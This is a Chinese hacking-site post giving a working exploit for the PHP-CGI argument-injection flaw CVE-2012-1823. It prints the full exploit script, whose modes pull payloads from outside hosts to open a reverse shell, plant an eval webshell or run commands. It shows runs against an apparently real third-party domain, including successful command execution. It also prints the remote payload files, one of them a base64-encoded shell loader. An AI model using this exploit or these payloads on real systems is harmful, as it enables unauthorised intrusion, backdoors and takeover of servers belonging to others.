WAP手机版 RSS订阅 加入收藏  设为首页
黑客新闻
当前位置:首页 > 黑客新闻

CVE-2012-1823 PHP-CGI漏洞利用方法

时间:2019/7/7 11:04:17   作者:安琪   来源:www.hack361.com   阅读:0   评论:0
内容摘要:CVE-2012-1823PHP-CGI漏洞利用方法漏洞描述:phpcgi漏洞作为CGI,PHP的运行时版本5.3.12和5.4.2参数注入漏洞是脆弱的。该模块采用了-d标志的优势,设置php.ini中的指令,以实现代码的执行。从咨询:“如果没有转义的'='查询字符串,该字符串被分成”+“字符(编码空间),urldec...

CVE-2012-1823 PHP-CGI漏洞利用方法

漏洞描述:php cgi漏洞

作为CGI,PHP的运行时版本5.3.12和5.4.2参数注入漏洞是脆弱的。该模块采用了-d标志的优势,设置php.ini中的指令,以实现代码的执行。从咨询:“如果没有转义的'='查询字符串,该字符串被分成”+“字符(编码空间),urldecoded,传递到一个函数,逃脱shell元字符(”在一个编码系统定义的方式“从RFC),然后将它们传递给CGI二进制文件。”
首先本机搭建php环境   wamp 在合适不过了
 
exp代码:贴上
 
----------------------------无效分割线--------------------------------
<?php   
/*  
*PHP CGI Argument Injection Exploit CVE-2012-1823  
*by:cfking  
*bbs:www.90sec.org  
*/ 
set_time_limit(0);  
$help='  
[>] php-cgi Remote code Execution Exploit CVE-2012-1823  
[>] by:cfking@90sec.org  
[>] Usage: php '.$argv[0].' host index.php <1/2/3> <ip/Command> <port>  
[>] Example: php '.$argv[0].' 127.0.0.1 / 2  
 ';  
if($argc<4)exit($help);  
print_r ('  
[>] PHP CGI Argument Injection Exploit CVE-2012-1823  
[>] by:cfking@90sec.org');  
$host=$argv[1];  
$filename=$argv[2];  
if($argv[3]=='1'){  
$port=$argv[5]? $argv[5]:4444;  
if(!$argv[4])exit("\n[-] Please enter IP and PORT\n");  
print "\n[+] Bindshell IP $argv[4] PORT $port\n";  
$payload=$argv[4].':'.$port;  
$target='http://www.cj360.cn/plus/cmd.php';  
}  
if($argv[3]=='2'){  
print "\n[+] Upload backdoor keio.php\n";  
$payload='';  
$target='http://60.190.93.216/manage/css/writeshell.txt';  
}  
if($argv[3]=='3'){  
if(!$argv[4])exit("\n[-] Please enter Command\n");  
print "\n[+] Command $argv[4]\n";  
$payload=$argv[4];  
$target='http://www.cj360.cn/plus/cmds.txt';  
}  
ob_start();   
$sock = fsockopen($host, 80, $errno, $errstr, 30);  
if (!$sock) die("$errstr ($errno)\n");  
fwrite($sock, "GET /$filename?-d+allow_url_include%3don+-d+auto_prepend_file%3d$target+-d+disable_functions%3doff HTTP/1.1\r\n");  
fwrite($sock, "User-Agent: $payload\r\n");  
fwrite($sock, "Host: $host\r\n\r\n");  
$headers = "";  
while ($str = trim(fgets($sock, 4096)))  
$headers .= "$str\n";  
echo "\n";  
$body = "";  
while (!feof($sock))  
$body .= fgets($sock, 4096);  
fclose($sock);  
echo $body;  
ob_end_flush();  
?> 
--------------------------------------------无效分割线----------------------------------------------
 
将上面代码保存为 exp.php  放在 wamp 安装后的 php.exe 同目录(就像安装了QQ 有 QQ.exe一样)
我的是 D:\wamp\php      同时在同目录建立一个cmd.bat  内容为 cmd.exe
 



 

双击打开cmd.bat 
D:\wamp\php>php exp.php gdfreenet.cn index.php 1 127.0.0.1 4444
[>] PHP CGI Argument Injection Exploit CVE-2012-1823
[>] by:cfking@90sec.org
[+] Bindshell IP 127.0.0.1 PORT 4444
9
no socket
0
 
执行命令之前先监听 本机的4444端口
如果提示no socket 说明反弹shell失败
 
D:\wamp\php>php exp.php gdfreenet.cn index.php 3 "id"
[>] PHP CGI Argument Injection Exploit CVE-2012-1823
[>] by:cfking@90sec.org
[+] Command id
37
uid=1941(user_7ek0k65m) gid=501(ftpd) groups=501(ftpd)
0
 
成功执行命令  id  是 linux下 查看是什么用户的命令
就像windows下 dir  列目录   linux下 ls 列目录
还可以将id换成其他的命令
 
D:\wamp\php>php exp.php gdfreenet.cn index.php 2
[>] PHP CGI Argument Injection Exploit CVE-2012-1823
[>] by:cfking@90sec.org
[+] Upload backdoor keio.php
19
webshell Write successful
0
 
 webshell Write successful 说明写shell成功
 

 



 

 

 

 
自己看接口就明白什么意思
意思是上传一个一句话 keio.php  密码为keio
print "\n[+] Upload backdoor keio.php\n";  
$payload='';  
$target='http://60.190.93.216/manage/css/writeshell.txt';  
<?php  
$file = fopen("keio.php","w");  
fwrite($file,'<?php eval($_POST[\'keio\'])?>');  
fclose($file);  
echo "webshell Write successful";  
exit;  
?> 
 
 
  
以下是接口内容:
 
Bindshell 的接口:
<?php   
$target='PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOyRhcnJheT1leHBsb2RlKCc6JywkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pOyRpcCA9ICRhcnJheVsw
XTskcG9ydCA9ICRhcnJheVsxXTskaXBmID0gQUZfSU5FVDtpZiAoRkFMU0UgIT09IHN0cnBvcygkaXAsICI6IikpIHsJJGlwID0gIlsiLiAkaXAgLiJdIjsJJGlwZ
iA9IEFGX0lORVQ2O31pZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7CSRzID0gJGYoInRjcDovL3skaXB9OnskcG
9ydH0iKTsJJHNfdHlwZSA9ICdzdHJlYW0nO30gZWxzZWlmICgoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7CSRzID0gJGYoJGlwLCAkcG9
ydCk7CSRzX3R5cGUgPSAnc3RyZWFtJzt9IGVsc2VpZiAoKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsJJHMgPSAkZigkaXBmLCBT
T0NLX1NUUkVBTSwgU09MX1RDUCk7CSRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOwlpZiAoISRyZXMpIHsgZGllKCk7IH0JJHNfdHlwZSA9I
Cdzb2NrZXQnO30gZWxzZSB7CWRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7fWlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfXN3aXRjaCAoJHNfdHlwZSkgeyBjYX
NlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhaztjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazt9aWYgKCE
kbGVuKSB7CWRpZSgpO30kYSA9IHVucGFjaygiTmxlbiIsICRsZW4pOyRsZW4gPSAkYVsnbGVuJ107JGIgPSAnJzt3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsJ
c3dpdGNoICgkc190eXBlKSB7IAljYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7CWNhc2UgJ3NvY2tldCc6ICRiI
C49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsJfX0kR0xPQkFMU1snbXNnc29jayddID0gJHM7JEdMT0JBTFNbJ21zZ3NvY2tfdHlwZS
ddID0gJHNfdHlwZTtldmFsKCRiKTtkaWUoKTsgZXhpdDs/Pg==';  
echo $code=base64_decode($target);  
?>
 

写入一句话webshell的接口:
<?php  
$file = fopen("keio.php","w");  
fwrite($file,'<?php eval($_POST[\'keio\'])?>');  
fclose($file);  
echo "webshell Write successful";  
exit;  
?> 
 
命令执行的接口:
<?php  
system($_SERVER["HTTP_USER_AGENT"]);  
exit;  
?> 


标签:PHP-CGI漏洞 
相关评论

本站资源来自互联网收集 仅供用于学习和交流 请遵循相关法律法规 本站一切资源不代表本站立场

Copyright 2018 黑客361 www.hack361.com All Rights Reserved 

站长QQ1437232096

技术交流群99802923